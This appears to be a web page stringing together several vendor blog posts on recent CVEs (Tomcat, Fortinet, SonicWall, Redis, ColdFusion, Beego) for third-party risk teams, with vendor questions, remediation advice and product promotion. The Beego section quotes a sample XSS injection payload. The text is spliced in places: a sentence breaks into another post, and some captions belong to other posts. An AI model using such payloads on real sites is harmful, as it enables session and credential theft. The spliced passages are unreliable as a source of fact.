CVE-2025-31650 is a denial-of-service issue in Tomcat’s HTTP/2 implementation: malformed priority headers lead to incomplete request cleanup, causing a memory leak and eventual server crash. It carries a CVSS v4 score of 8.7 and an EPSS of 0.03%. CVE-2025-31651 is a rewrite-rule bypass flaw in Tomcat’s RewriteValve: certain percent-encoded paths slip past security rules, exposing JSP shells or confidential files. It has a CVSS v3.1 score of 7.5 and an EPSS of 0.02%. Both were first published on April 28, 2025National Vulnerability DatabaseNational Vulnerability Database. Public proof-of-concept code exists for each, but no active exploitation has been reported and neither appears in CISA’s Known Exploited Vulnerabilities catalog.
Why should TPRM professionals care?
Apache Tomcat powers countless web applications. A DoS can disrupt critical services and lead to business outages, while a rewrite-rule bypass can expose sensitive data and application logic. In a third-party risk context, vendors running affected versions—even if not compromised—pose material operational and data-exposure risks.
What questions should TPRM professionals ask vendors about these flaws?
To home in on true exposure, consider asking:
Have you updated all instances of Apache Tomcat to versions 9.0.104, 10.1.40, or 11.0.6 (or later) to mitigate the risk of CVE-2025-31650 and CVE-2025-31651?
Can you confirm if you have disabled HTTP/2 or the RewriteValve entirely if your application does not explicitly require them, as recommended in the advisory to mitigate the risk of CVE-2025-31650 and CVE-2025-31651?
Have you implemented runtime protections such as using a reverse proxy (e.g. NGINX, Apache HTTPD) to filter out invalid HTTP/2 frames and suspicious URL-encoded paths before they reach Tomcat, as recommended in the advisory?
Have you audited and strengthened your RewriteValve rules, including adding explicit RewriteCond checks to reject requests containing %3F, %25, or other high-risk encodings, as recommended in the advisory to mitigate the risk of CVE-2025-31651?
Remediation Recommendations for Vendors subject to this risk
Vendors should:
Upgrade to Fixed Versions: Immediately move to Apache Tomcat 9.0.104, 10.1.40, or 11.0.6 (or later).
Harden HTTP/2 Configuration: Disable HTTP/2 if not required; otherwise, enforce valid priority header parsing at the proxy or WAF.
Review RewriteValve Rules: Ensure canonicalization of percent-encoded paths and add explicit RewriteCond checks for high-risk encodings.
Implement Runtime Protections: Use a reverse proxy or WAF to drop malformed HTTP/2 frames and suspicious URL-encoded requests before they reach Tomcat.
Monitor & Alert: Instrument JVM memory metrics for early out-of-memory warnings; log and alert on anomalous priority headers or percent-encoded URIs.
How TPRM professionals can leverage Black Kite for these Apache Tomcat vulnerabilities
Black Kite published the “Apache Tomcat – Apr2025” FocusTag on April 30, 2025, highlighting both DoS (CVE-2025-31650) and rewrite-rule bypass (CVE-2025-31651) flaws. Through the platform, TPRM teams can:
Identify exposed vendors running affected Tomcat versions with HTTP/2 or RewriteValve enabled.
Obtain asset details—including IP addresses and subdomains—hosting vulnerable instances.
Track patch deployment and anomalous activity around HTTP/2 and rewrite endpoints.
Target outreach to only vendors with confirmed exposure, reducing questionnaire overload and speeding mitigation.
Black Kite’s Redis Server FocusTagTM details critical insights on the event for TPRM professionals.
Elevating TPRM Outcomes With Black Kite’s FocusTags™
Black Kite’s FocusTags™ are essential for transforming raw vulnerability data into TPRM-ready intelligence. With tags for SAP NetWeaver VCFRAMEWORK and Apache Tomcat’s April 2025 flaws, TPRM teams can:
Rapid Vendor Exposure Discovery: Flag which suppliers run the vulnerable Visual Composer component or affected Tomcat versions with HTTP/2 or RewriteValve enabled.
Precise Asset Mapping: Retrieve IP addresses and subdomain details tied to exposed servers for targeted assessments.
Risk Prioritization: Focus remediation by combining vulnerability severity (critical RCE vs. high DoS/bypass) and vendor importance.
Efficient Vendor Engagement: Tailor questionnaires and follow-ups only to vendors with confirmed exposures, cutting down on outreach volume.
Ongoing Monitoring: Track patch deployment status and detect post-patch exploitation attempts around /metadatauploader endpoints or malformed HTTP/2 traffic.
By integrating these FocusTags™ into your TPRM workflow, you gain a data-driven method that accelerates vendor risk reduction and boosts overall supply-chain resilience.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
FocusTagsTM in the Last 30 Days:
SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
Welcome to this week’s Focus Friday, where we spotlight emerging cybersecurity threats through the lens of Third-Party Risk Management (TPRM). As organizations continue to rely heavily on digital ecosystems involving hundreds or thousands of vendors, a single vulnerability in a third-party product can ripple across entire supply chains. This week, we analyze three critical issues affecting high-profile technologies used globally: the exploitation of Fortinet SSL-VPN vulnerabilities through a symlink backdoor, a DoS flaw in SonicWall’s Gen7 SSLVPN interface, and a resource exhaustion vulnerability in Redis servers. Each of these poses unique challenges for TPRM professionals seeking to evaluate vendor exposure and reduce systemic risk.
Through the use of Black Kite’s FocusTags™, organizations can more effectively identify which vendors are likely impacted, prioritize mitigation efforts, and streamline communication. Let’s break down the technical and strategic implications of each threat.
Filtered view of companies with Fortinet Symlink Backdoor FocusTag™ on the Black Kite platform.
Fortinet Symlink Backdoor: Legacy CVEs Continue to Impact Organizations
What is the Fortinet Symlink Backdoor and Which Vulnerabilities Are Involved?
A newly identified post-exploitation method has come to light, which exploits previously patched FortiGate vulnerabilities—CVE‑2022‑42475, CVE‑2023‑27997, and CVE‑2024‑21762. This technique involves the creation of symbolic links within the SSL-VPN language files directory, effectively leveraging access to gain persistent visibility into the root file system. Upon gaining access to a vulnerable FortiGate device, attackers created symbolic links in the public-facing language folder, enabling them to bypass patching efforts and maintain read access to critical system files—even after the original flaws had been remediated.
CVE-2022-42475: A heap-based buffer overflow vulnerability in FortiOS SSL-VPN, allowing arbitrary code execution. CVSS: 9.8, EPSS: 93.17%
CVE-2023-27997: A heap-based buffer overflow in FortiOS and FortiProxy SSL-VPN, enabling remote code execution. CVSS: 9.8, EPSS: 90.28%
CVE-2024-21762: An out-of-bounds write vulnerability in FortiOS, leading to arbitrary code execution. CVSS: 9.8, EPSS: 91.91%
According to telemetry from the Shadowserver Foundation, over 16,620 FortiGate devices across the globe have been compromised through this symlink backdoor. The majority of these cases are concentrated in Asia, followed by Europe and North America.
Proof-of-concept exploit code for the related vulnerabilities is readily available online. All three CVEs involved were added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in 2022, 2023, and 2024, reflecting their known exploitation in real-world attacks. Notably, Black Kite previously issued FocusTags™ for two of these vulnerabilities: CVE‑2024‑21762 was tagged with the “FortiOS SSL VPN [Suspected]” label on February 9, 2024, while CVE‑2022‑42475 was covered under the “APT‑Risk: FortiOS/Zoho” tag on September 7, 2023. Customers who responded to those alerts likely addressed the underlying vulnerabilities proactively. However, this newly emerged post-exploitation technique warrants renewed attention.
Each of these vulnerabilities is known to be actively exploited in the wild. CVE-2022-42475 has been linked to APT5, Volt Typhoon, and UNC3886, and associated with malware families such as BOLDMOVE, Coathanger, and NoName. CVE-2023-27997 has been exploited by Volt Typhoon, APT15, APT31, Fox Kitten, RansomHub, and MirrorFace, with related malware including Coathanger, LODEINFO, NOOPDOOR, and RansomHub. CVE-2024-21762 has also seen confirmed exploitation by Volt Typhoon, often using the Coathanger and Black Basta malware families. While there is no confirmed proof that CVE-2024-21762 was directly used to plant this specific symlink backdoor, its exploitation remains highly probable and cannot be ruled out.
CISA added CVE-2023-27997 to its Known Exploited Vulnerabilities (KEV) catalog on June 13, 2023, and CVE-2024-21762 on February 9, 2024 . CVE-2022-42475 has also been associated with nation-state threat actors.
Why Should TPRM Professionals Be Concerned About This Backdoor?
FortiGate devices are widely used for network security, including firewall and VPN functionalities. A compromised FortiGate device within a vendor’s infrastructure can lead to unauthorized access to sensitive data, configuration files, and network traffic. This persistent access poses significant risks, including data breaches and lateral movement within networks.
What Questions Should TPRM Professionals Ask Vendors Regarding This Issue?
To assess the risk associated with this backdoor, consider asking vendors the following questions:
Have you upgraded your Fortinet devices to the patched FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, or 6.4.16 to mitigate the risk of CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762?
Have you implemented the recommended actions such as hardening SSL-VPN configurations, continuous monitoring, forensic assessment & cleanup, and deploying AV/IPS signatures to detect and remove the malicious symbolic link?
Can you confirm if you have disabled SSL-VPN if not in use, or restricted access to trusted IPs only, as part of your mitigation strategy against the persistent symlink exploit in Fortinet devices?
Have you conducted a forensic investigation to identify and remove lingering symlinks, reset all credentials, revoke certificates, and rotate secrets that may have been exposed due to the exploitation of CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762?
Remediation Recommendations for Vendors Subject to This Risk
Vendors should take the following actions to mitigate the risk associated with the Fortinet Symlink Backdoor:
Update FortiOS: Upgrade to the latest FortiOS versions that address the known vulnerabilities and remove the symlink backdoor.
Inspect for Indicators of Compromise: Examine FortiGate devices for unauthorized symbolic links and other signs of compromise.
Review SSL-VPN Configurations: Ensure that SSL-VPN settings are secure and do not allow unauthorized access to sensitive directories.
Implement Monitoring and Alerting: Set up continuous monitoring to detect unusual activities or configurations within FortiGate devices.
How Can TPRM Professionals Leverage Black Kite for This Vulnerability?
Black Kite provides a FocusTag for the Fortinet Symlink Backdoor, enabling organizations to identify vendors potentially affected by this issue. The FocusTag includes detailed information about the associated vulnerabilities, affected assets, and remediation guidance. By utilizing this FocusTag, TPRM professionals can prioritize their risk assessments, focusing on vendors with known exposures, and facilitate targeted remediation efforts.
Black Kite’s Fortinet Symlink Backdoor FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-32818 in SonicWall SSLVPN Gen 7
What is the SonicWall SSLVPN DoS Vulnerability?
CVE-2025-32818 is a high-severity vulnerability impacting the SonicWall SonicOS SSLVPN Virtual Office interface, identified as a Null Pointer Dereference issue. This flaw allows unauthenticated remote attackers to crash the firewall, leading to a Denial-of-Service (DoS) condition. The vulnerability affects Gen7 firewall models and NSv platforms running firmware versions 7.1.1-7040 through 7.1.3-7015, and TZ80 models on version 8.0.0-8037 or earlier.
Disclosed publicly on April 23, 2025, by SonicWall PSIRT (Advisory ID: SNWLID-2025-0009), the vulnerability has a CVSS v3 score of 7.5 and an EPSS score of 0.04%. It is exploitable only if the SSLVPN service is enabled. While proof-of-concept exploit code is not yet publicly available, and the issue is not included in CISA’s Known Exploited Vulnerabilities catalog, proactive mitigation is strongly encouraged. Given the firewall’s critical role in securing remote access, any disruption to its availability can impact business continuity.
Why Should TPRM Professionals Be Concerned About This Vulnerability?
SonicWall Gen7 devices are widely deployed by vendors for secure remote access. These devices protect sensitive traffic through their SSLVPN services, and a crash of such a firewall can mean sudden loss of remote connectivity, disruption of business-critical workflows, and exposure to further compromise during downtime. Even though this vulnerability does not allow code execution or data exfiltration directly, it can be weaponized for targeted service disruption—especially in organizations that rely on 24/7 availability.
From a third-party risk perspective, a vendor with vulnerable or improperly configured SonicWall devices may lose access to essential services or fail to meet service-level agreements (SLAs). If exploited during an incident, the firewall’s unavailability can also delay incident response or containment activities.
What questions should TPRM professionals ask vendors about CVE-2025-32818?
To better understand vendor exposure and readiness, consider asking:
Have you updated your Gen7 NSv & Firewalls to SonicOS 7.2.0-7015 or later, and TZ80 to 8.0.1-8017 or later to mitigate the risk of CVE-2025-32818?
Can you confirm if the SSLVPN service on your SonicWall devices has been disabled to prevent the exploitation of the Null Pointer Dereference issue in the SonicOS SSLVPN Virtual Office interface?
Have you observed any unexpected reboots or service interruptions in your Gen7 NSv (NSv 270, NSv 470, NSv 870), Gen7 Firewalls (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700: Firmware 7.1.1-7040 through 7.1.3-7015 (7.1.x)) and TZ80: 8.0.0-8037 and earlier, which could indicate a Denial-of-Service attack due to CVE-2025-32818?
Have you implemented strict access controls on all management interfaces and disabled unused services on your SonicWall devices as a part of hardening measures against potential exploitation of CVE-2025-32818?
Remediation Recommendations for Vendors Subject to This Risk
Vendors using SonicWall SSLVPN Gen7 appliances should take the following remediation steps:
Apply Firmware Updates: Upgrade all affected Gen7 Firewalls and NSv platforms to version 7.2.0-7015 or higher, and TZ80 devices to 8.0.1-8017 or higher.
Temporarily Disable SSLVPN: If patching cannot be performed immediately, disable the SSLVPN service to prevent exploitation.
Audit System Logs: Review logs for signs of service crashes or abnormal behavior linked to SSLVPN usage.
Restrict Access: Limit external access to the SSLVPN interface through IP whitelisting and network segmentation.
Review Configuration: Ensure unnecessary services, especially public-facing features like Virtual Office, are disabled when not in use.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the SonicWall SSLVPN Gen7 FocusTag on April 25, 2025, enabling TPRM teams to pinpoint vendors potentially exposed to CVE-2025-32818. This tag provides asset-level visibility, including IP addresses and service banners that indicate the presence of vulnerable configurations.
By using this FocusTag, risk managers can prioritize outreach to vendors actively running impacted SonicWall models and validate whether they’ve implemented mitigation steps. If a vendor has SonicWall SSLVPN publicly exposed, the tag surfaces this directly, significantly reducing the scope of your due diligence efforts.
This tag is especially useful for organizations relying on multiple vendors that use SonicWall for remote access, helping you rapidly assess operational impact and contain downstream availability risks before they escalate.
Black Kite’s SonicWall SSLVPN Gen7 FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-21605 in Redis Server
What is the Redis Server DoS Vulnerability?
CVE-2025-21605 is a high-severity Denial-of-Service (DoS) vulnerability impacting Redis servers. The flaw arises due to unlimited growth of output buffers, caused by an unauthenticated client sending commands or triggering repeated “NOAUTH” responses when password authentication is enabled. If exploited, the Redis server’s memory can be completely exhausted, causing the service to crash. This vulnerability carries a CVSS v3 score of 7.5 and an EPSS score of 0.04%.
First publicly disclosed on April 23, 2025, via GitHub Security Advisories (GHSA-r67f-p999-2gff), the issue affects Redis versions from 2.6 up to but not including 7.4.3. Although no proof-of-concept exploit code is publicly available at this time, Redis’s widespread deployment in production environments elevates the concern. As of today, CVE-2025-21605 has not been added to CISA’s Known Exploited Vulnerabilities catalog, and no advisory has been released by CISA.
Redis maintainers have addressed this vulnerability in Redis 7.4.3, where sensible client output buffer limits have been introduced.
Why Should TPRM Professionals Be Concerned About This Vulnerability?
Redis servers are commonly used to cache critical application data, manage sessions, and handle real-time information. A service crash triggered by an unauthenticated client could lead to serious disruption in vendor environments, including website outages, application failures, and business process interruptions.
From a TPRM perspective, any vendor relying on exposed or improperly secured Redis instances is at risk of operational downtime without advance warning. In environments where Redis clusters are part of larger SaaS offerings or critical backend systems, a DoS incident could cascade across dependent systems, impacting availability and client trust. Given that Redis by default does not restrict output buffer growth for normal clients, vendors who have not proactively hardened their Redis configurations may be vulnerable.
What questions should TPRM professionals ask vendors about CVE-2025-21605?
To assess third-party exposure related to this Redis vulnerability, consider asking:
Have you updated all instances of Redis Server to version 7.4.3 or later to mitigate the risk of CVE-2025-21605?
Have you configured the client-output-buffer-limit normal <hard-limit> in redis.conf to throttle untrusted clients and prevent unlimited output buffer growth?
Have you enforced TLS and required client-side certificates to ensure only authenticated clients can connect to your Redis servers?
Have you implemented network access controls such as firewalls, iptables, or security groups to restrict unauthenticated access to your Redis servers?
Remediation Recommendations for Vendors Subject to This Risk
Vendors should adopt the following mitigation and remediation strategies:
Upgrade Redis: Update Redis servers to version 7.4.3 or later, where built-in safeguards against buffer exhaustion are implemented.
Apply Manual Controls: Set a strict client-output-buffer-limit for normal clients in the redis.conf configuration file.
Restrict Access: Use firewalls, iptables, or security groups to limit access to Redis servers only to trusted networks or authenticated clients.
Enforce Secure Communication: Enable TLS encryption and require client-side certificates to authenticate users connecting to the Redis server.
Monitor Resource Utilization: Continuously monitor memory usage patterns and set up alerts for unusual output buffer growth.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite released the Redis Server FocusTag on April 23, 2025, allowing organizations to quickly identify vendors potentially exposed to CVE-2025-21605. By using this FocusTag, TPRM teams can pinpoint companies operating vulnerable Redis versions or improperly configured instances that may be susceptible to DoS attacks.
The FocusTag enriches risk assessments by providing asset-level intelligence such as IP addresses and relevant service information. With this insight, TPRM professionals can prioritize outreach and remediation requests, ensuring that critical third-party partners address the vulnerability before it leads to business disruption.
In environments where Redis plays a pivotal backend role, using Black Kite’s FocusTags™ ensures that availability risks are proactively managed, rather than discovered during an unexpected service failure.
Black Kite’s Redis Server FocusTagTM details critical insights on the event for TPRM professionals.
Enabling Proactive TPRM With Black Kite’s FocusTags™
The vulnerabilities explored in this week’s Focus Friday—ranging from backdoor persistence via patched Fortinet SSL-VPN flaws, to denial-of-service conditions in SonicWall appliances and Redis servers—highlight the diverse and evolving nature of third-party cybersecurity risk. In environments where availability, remote access security, and in-memory data handling are mission-critical, even a single overlooked CVE can introduce severe operational and reputational damage.
Black Kite’s FocusTags™ empower TPRM teams to tackle this complexity head-on with:
Asset-Specific Vulnerability Detection: Identify which vendors are operating affected systems based on real asset intelligence, including IP addresses and exposed services.
Risk Triage at Scale: Quickly narrow down vendor lists by severity, exposure type, and system criticality—enabling faster decisions and response planning.
Vendor-Specific Inquiry Support: Use detailed FocusTag insights to pose informed, vulnerability-specific questions during vendor outreach.
Improved Incident Preparedness: Continuously monitor your third-party landscape as new vulnerabilities emerge, ensuring that no critical issue is missed.
With threats targeting everything from network edge devices to internal caching systems, Black Kite’s FocusTags™ offer a powerful lens to see where exposure lies, how to address it, and how to prioritize what matters most—before incidents escalate.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
Drowning in vulnerability alerts? You’re not alone. Cybersecurity professionals dealing with Third-Party Risk Management (TPRM) are facing an overwhelming flood of Common Vulnerabilities and Exposures (CVEs), making it nearly impossible to address every single threat. Traditional methods of vulnerability management, often relying solely on severity scores, simply aren’t cutting it in today’s complex supply chain environment. How do you decide which vulnerabilities to tackle first when you have thousands clamoring for attention?
Fortunately, there’s a better way.
In this video, I walk through the findings of our 2025 Supply Chain Vulnerability Report, featuring original research by the Black Kite Research & Intelligence Team (BRITE), breaking down the key challenges of vulnerability prioritization and introducing a powerful three-dimensional approach that helps TPRM professionals effectively prioritize vulnerabilities in their supply chain. This method allows you to focus on what truly matters and dramatically reduce risk.
This is the traditional approach, using metrics like CVSS to assess the potential impact of a vulnerability. While important, the report emphasizes that severity alone is insufficient.
2. Exploitability
This dimension considers the likelihood of a vulnerability being actively exploited by threat actors. Factors like the availability of exploit code and threat actor trends come into play.
3. Exposure
This crucial element addresses how many of your vendors or third parties are susceptible to a specific vulnerability. A high-severity, easily exploitable vulnerability affecting a large number of your vendors poses a significantly greater risk.
Result: Hear the Signal in the Noise
By combining these three dimensions, security teams can move beyond simply reacting to the loudest alerts and develop a truly strategic approach to vulnerability management. The video provides clear explanations and visual aids to help you grasp these concepts and begin implementing them in your own organization.
Dive deeper and gain a comprehensive understanding of supply chain vulnerability management. Read the full 2025 Supply Chain Vulnerability Report for detailed analysis, actionable recommendations, and best practices.
Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.
Welcome to this week’s Focus Friday, where we examine three high‑profile vulnerabilities through a Third‑Party Risk Management (TPRM) lens. Today, we’ll dive into the critical remote code execution flaw in Ivanti Connect Secure As cyber threats continue to evolve in scope and complexity, Third-Party Risk Management (TPRM) teams are increasingly challenged to respond to emerging vulnerabilities with speed and precision. In this week’s Focus Friday, we examine two critical security issues—one affecting Adobe ColdFusion and the other targeting the Beego framework for Go. Both vulnerabilities expose organizations to serious risks, including remote code execution (RCE), access control bypass, and session hijacking.
We break down each incident from a TPRM perspective, highlighting the specific technical risks, vendor remediation recommendations, and key questions TPRM professionals should ask. Additionally, we demonstrate how Black Kite’s FocusTags™ help organizations identify affected vendors quickly and take meaningful action without wasting time on broad-based questionnaires or assumptions.
Filtered view of companies with Adobe ColdFusion FocusTag™ on the Black Kite platform.
Critical Adobe ColdFusion Vulnerabilities
What are the Critical Vulnerabilities Recently Discovered in Adobe ColdFusion?
A large set of critical vulnerabilities was recently identified in Adobe ColdFusion, affecting versions 2021, 2023, and 2025. These flaws, including CVE-2025-24446, CVE-2025-24447, CVE-2025-30281 through CVE-2025-30290, span multiple attack categories such as arbitrary file system read, remote code execution (RCE), OS command injection, access control bypass, and improper authentication. The CVSS scores for these vulnerabilities range from 7.5 to 9.8, and their EPSS scores indicate active risk, with some as high as 1.44%.
These vulnerabilities stem from insecure deserialization, improper input validation, access control weaknesses, and failure to sanitize user-supplied input.
While no exploitation has been observed in the wild yet, and these CVEs are not currently listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, the public disclosure on April 8, 2025, along with multiple critical CVSS scores and high EPSS predictions, raises serious concerns.
Why Should TPRM Professionals Care About These Vulnerabilities?
TPRM professionals must be particularly cautious when it comes to ColdFusion deployments, as these vulnerabilities directly impact critical business applications hosted on ColdFusion platforms. Exploitation could lead to unauthorized file access, arbitrary code execution, or full system compromise—potentially exposing sensitive client data or internal business logic.
Adobe ColdFusion is frequently used in enterprise and government environments. The presence of deserialization vulnerabilities and OS-level command injection significantly increases the risk of lateral movement, persistent access, and data exfiltration within third-party ecosystems. Additionally, since these issues affect all ColdFusion versions prior to the latest updates, unpatched systems are common in unmanaged or aging vendor environments.
What Questions Should TPRM Professionals Ask Vendors About These Vulnerabilities?
To assess vendor exposure, TPRM professionals should consider asking:
Have you updated all instances of Adobe ColdFusion to the latest versions (ColdFusion 2021 Update 19, ColdFusion 2023 Update 13, ColdFusion 2025 Update 1) to mitigate the risk of the mentioned CVEs?
Can you confirm if you have implemented the recommended actions such as auditing access controls and logs, reviewing file upload and deserialization controls, and limiting application exposure to mitigate the risk of these vulnerabilities?
Have you applied the security configuration settings included in the ColdFusion Security documentation and reviewed the respective Lockdown guides as recommended by Adobe?
Have you updated your ColdFusion JDK/JRE LTS version to the latest update release and set the recommended JVM flags on a JEE installation of ColdFusion as a secure practice?
Remediation Recommendations for Vendors Subject to This Risk
Vendors using ColdFusion should take the following technical steps to address these vulnerabilities:
Patch Immediately: Upgrade ColdFusion to the latest versions—2025 Update 1, 2023 Update 13, or 2021 Update 19.
Secure Deserialization and Upload Paths: Review all serialization-related functions and restrict unsafe classes using Adobe’s serial filter documentation.
Apply JVM Flags for JEE Installations: Set -Djdk.serialFilter values as recommended by Adobe to block dangerous object types during deserialization.
Isolate ColdFusion Services: Place ColdFusion services behind firewalls or WAFs and restrict access to only required IP ranges.
Audit Access Logs: Review logs for unauthorized access attempts or security feature misuse, especially around the setAdminPassword, upload handlers, or URL routing logic.
Follow Adobe’s Lockdown Guide: Apply recommended security configurations from Adobe’s official lockdown and JVM guidance for your ColdFusion version.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the Adobe ColdFusion FocusTag™ on April 11, 2025, to help organizations identify at-risk vendors rapidly. Using internet-wide scanning, subdomain fingerprinting, and exposed asset detection, Black Kite identifies vendors that host ColdFusion installations vulnerable to the disclosed CVEs.
TPRM teams can use this FocusTag™ to immediately narrow down the list of potentially impacted vendors, enabling fast risk prioritization, informed questioning, and effective outreach. By providing visibility into external-facing infrastructure and the likelihood of exposure, Black Kite simplifies complex supply chain risk monitoring in real time.
Black Kite’s Adobe ColdFusion FocusTagTM details critical insights on the event for TPRM professionals.
What is the Critical XSS Vulnerability in the Beego Framework?
CVE-2025-30223 is a critical Cross-Site Scripting (XSS) vulnerability discovered in the Beego web framework for Go, affecting all versions up to and including v2.3.5. The issue resides in the RenderForm() function, which dynamically generates HTML form fields. This function improperly handles user-supplied input and outputs it as raw HTML using template.HTML, bypassing Go’s built-in HTML escaping mechanisms.
The underlying problem originates from a helper function, renderFormField(), which uses fmt.Sprintf() to construct form input fields with values such as label, name, and value directly injected into the HTML structure. Since no HTML escaping is applied to these values, attackers can inject JavaScript payloads into form fields. This makes it possible to exploit the vulnerability through:
Attribute Injection, such as injecting code into the DisplayName field (onmouseover=”alert(‘XSS’)”),
Content Injection, such as inserting <script> tags into a textarea field.
With a CVSS score of 9.3, the vulnerability poses significant risk, especially in applications where user-generated content is displayed to others. Although this CVE is not listed in CISA’s KEV catalog as of now, a public proof-of-concept (PoC) was made available in early April 2025, demonstrating how JavaScript payloads can be rendered and executed in real-world browser sessions.
Why Should TPRM Professionals Care About This Vulnerability?
Beego is a widely adopted Go framework, popular among SaaS and platform providers due to its performance and simplicity. Applications that use RenderForm() with user-controlled inputs are highly susceptible to exploitation. This vulnerability is especially problematic for TPRM because:
It allows client-side code execution in users’ browsers.
It enables session hijacking, credential theft, and fake form injection.
It can compromise administrative interfaces, resulting in account takeover of privileged users.
Vendors using Beego without proper patching or escaping mechanisms expose their customers to client-side threats that are difficult to detect from the backend. Moreover, XSS vulnerabilities often serve as an entry point for further attacks, including credential stuffing, business logic abuse, or malware injection.
What Questions Should TPRM Professionals Ask Vendors About This Vulnerability?
To assess the exposure of vendors using the Beego framework, consider asking the following:
Have you upgraded all instances of Beego Framework to version v2.3.6 or later to mitigate the risk of CVE-2025-30223?
Can you confirm if you have reviewed all components using the RenderForm() function in your Beego application and ensured that no untrusted data is passed directly without escaping?
Have you implemented a strong Content Security Policy (CSP) to restrict which scripts can be executed in the browser, as a measure to prevent the execution of malicious JavaScript injected via XSS?
Have you audited stored data that might have been injected with XSS payloads before patching, especially in user-generated fields like DisplayName or Bio, to ensure no malicious scripts are present?
Remediation Recommendations for Vendors Subject to This Risk
Organizations using vulnerable Beego versions should take immediate actions:
Upgrade Beego to v2.3.6 or later, which properly escapes all HTML input using template.HTMLEscapeString() inside RenderForm() and its helper methods.
Sanitize All Inputs: Audit application code to ensure no unescaped user data is being passed to the UI layer.
Implement CSP: Use Content Security Policy headers to prevent the execution of inline or unauthorized scripts.
Review Cookies: Set HttpOnly and Secure flags on cookies to prevent session theft through JavaScript.
Scan and Monitor: Use automated security scanners to detect residual or future XSS vulnerabilities and monitor for unusual activity within administrative dashboards.
Audit Stored Data: Check stored fields like DisplayName and Bio for embedded scripts that may persist across sessions.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite published the FocusTag™ for the Beego XSS vulnerability (CVE-2025-30223) on April 11, 2025. This tag identifies vendors whose exposed applications may be using vulnerable versions of the Beego framework. By analyzing HTML source code, script libraries, and domain-level fingerprints, Black Kite provides asset-specific intelligence such as affected subdomains or externally facing interfaces.
With the tag’s VERY HIGH confidence level, TPRM professionals can quickly pinpoint which vendors require immediate outreach. The FocusTag™ streamlines due diligence by narrowing down the scope of concern, enabling organizations to conduct targeted assessments instead of issuing blanket questionnaires.
Black Kite’s Beego FocusTagTM details critical insights on the event for TPRM professionals.
Enhancing TPRM With Black Kite FocusTags™
The rise of exploitable software supply chain vulnerabilities—such as those in Adobe ColdFusion and Beego—demands a smarter, more targeted approach to Third-Party Risk Management. Black Kite’s FocusTags™ deliver that precision by equipping organizations with real-time, asset-level intelligence tied to the latest threats. Here’s how these tags empower TPRM teams:
Threat-Centric Vendor Identification: Know exactly which vendors in your ecosystem are affected by vulnerabilities like CVE-2025-30223 or CVE-2025-24447—no guesswork, no overreach.
Risk-Based Prioritization: Align vendor outreach efforts with the severity of each threat and the business criticality of the impacted third parties.
Actionable Engagement: Conduct targeted conversations with vendors, backed by knowledge of exposed assets, vulnerable software versions, and available patches.
Continuous Security Visibility: Access a constantly updated view of your third-party landscape, driven by internet-wide scanning, external intelligence, and contextual enrichment.
FocusTags™ are more than alerts—they are operational tools built to support agile, scalable risk management strategies. Whether responding to deserialization flaws in ColdFusion or XSS vectors in Beego, Black Kite’s platform ensures TPRM professionals are equipped with the right insights, right when they need them.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
Every breach tells a story. In 2024, that story was about third-party vulnerabilities becoming the preferred entry point for attackers. From ransomware attacks that threatened supply chains to credential misuse that compromised entire industries, third-party breaches surged in both scale and sophistication.
Black Kite’s 2025 Third-Party Breach Report takes a deep dive into these incidents, analyzing the most significant third-party breaches of 2024 to identify the key trends shaping the future of cybersecurity. This year’s findings highlight critical shifts in the third-party risk landscape: ransomware affiliates are becoming more aggressive, unauthorized network access remains the most exploited attack vector, and regulatory frameworks are driving improvements — but not evenly across industries.
5 Takeaways from the 2025 Third-Party Breach Report
For cybersecurity leaders looking to adapt their strategies for the year ahead, here are a few notable findings from this year’s report — and what they mean for your approach to third-party risk management.
Read Black Kite’s 2025 Third-Party Breach Report, no download required.
1. A shift to continuous risk monitoring
In 2024, the Cleo File Transfer ransomware attack was a wake-up call that exposed the shortcomings of traditional third-party risk management. Attackers exploited unpatched vulnerabilities in widely used file transfer software, impacting dozens of organizations across industries. Traditional security assessments failed to catch these risks, but proactive monitoring tools could have flagged these vulnerabilities before attackers did.
For example, for too long, third-party risk management (TPRM) has relied on security questionnaires. Organizations track response rates, completion metrics, and compliance checklists — but breaches keep happening. The problem? These assessments measure vendor effort, not actual security posture, and for one point in time at that..
Meanwhile, ransomware groups aren’t wasting time with paperwork. They’re studying supply chains, buying marketing intelligence, and doing everything they can to learn more about their victims and their supply chains. Questionnaires are no defense against this kind of sophisticated, intentional approach.
